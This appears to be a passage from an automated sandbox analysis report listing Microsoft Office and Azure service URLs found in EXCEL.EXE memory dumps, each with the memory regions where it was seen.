Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeMy
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeNJ
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeN~
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizePF
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizePzf
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeQ
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeRD
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeRx
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeT
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeU
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeVtd
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizebE
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizebyp
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizecJ
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizecom7KT
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizec~s
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeetu
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizefut
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizegzw
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeizerJ
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizek
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizel~b
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizemK
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizepD
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizepxF
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeqyA
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizesKh
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizete
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeu
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeuuE
Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizevF
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeyV
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizez
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/TOa
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://management.azure.com
Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://management.azure.com/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://management.azure.com/q
Source: EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://messaging.office.com/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyt
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://ncus.contentsync.
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://ncus.pagecontentsync.
